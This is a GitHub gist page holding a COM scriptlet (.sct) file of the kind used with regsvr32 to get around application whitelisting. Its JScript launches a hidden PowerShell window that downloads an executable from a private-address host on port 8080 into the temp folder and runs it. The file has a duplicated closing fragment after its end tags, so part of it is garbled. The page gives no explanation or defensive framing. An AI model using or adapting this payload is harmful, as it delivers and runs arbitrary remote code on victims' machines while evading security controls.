Skip to content

Instantly share code, notes, and snippets.

@void-in
Last active September 8, 2017 05:46
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save void-in/a78e5676ace2ff25551d409c2a8fb041 to your computer and use it in GitHub Desktop.
Save void-in/a78e5676ace2ff25551d409c2a8fb041 to your computer and use it in GitHub Desktop.
<?XML version="1.0"?>
<scriptlet>
<registration
description="test"
progid="test"
version="1.00"
classid="{BBBB4444-0000-0000-0000-0000FAADACDC}"
remotable="true"
>
</registration>
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("powershell.exe -nop -w hidden -c $z=echo ($env:temp+'\cwIWCTq5.exe');(new-object System.Net.WebClient).DownloadFile('http://10.10.71.203:8080/', "$z");invoke-item $z");
]]>
</script>
</scriptlet>");
]]>
</script>
</scriptlet>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment